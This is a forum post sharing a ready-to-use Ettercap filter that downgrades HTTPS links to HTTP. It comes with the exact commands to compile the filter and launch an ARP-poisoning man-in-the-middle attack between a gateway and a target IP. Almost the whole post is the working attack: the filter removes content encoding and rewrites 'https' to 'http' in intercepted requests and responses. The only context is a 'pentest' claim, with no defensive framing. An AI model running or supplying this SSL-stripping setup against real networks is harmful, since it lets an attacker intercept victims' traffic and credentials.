Jump to content
alien

Turn HTTPS into HTTP - MITM Ettercap filter

Recommended Posts

Just place it in HTTPS.FILTER, then compile it using "etterfilter" with the command : etterfilter https.filter -o https.ef Then You good to go with : ettercap -T -q -F https.ef -M ARP:remote /GATEWAY/ /TARGET_IP/ .


##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80)
{
if (search(DATA.data, "Accept-Encoding"))
{
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
}
}
#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80)
{
# msg("[HTTP Response Filter] HTTP request seen.\n");
if (search(DECODED.data, "https"))
{
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
if (search(DATA.data, "https"))
{
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
}
##
# Response
if (ip.proto == TCP && tcp.src == 80)
{
# msg("[HTTP Response Filter] HTTP response seen.\n");
if (search(DECODED.data, "https"))
{
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
if (search(DATA.data, "https"))
{
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
}

Source: I'M NASRO, I PENTEST ^^

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...